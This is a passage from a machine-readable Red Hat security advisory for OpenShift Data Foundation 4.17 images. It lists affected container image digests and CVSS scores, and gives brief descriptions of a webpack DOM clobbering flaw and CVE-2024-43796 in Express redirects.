"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
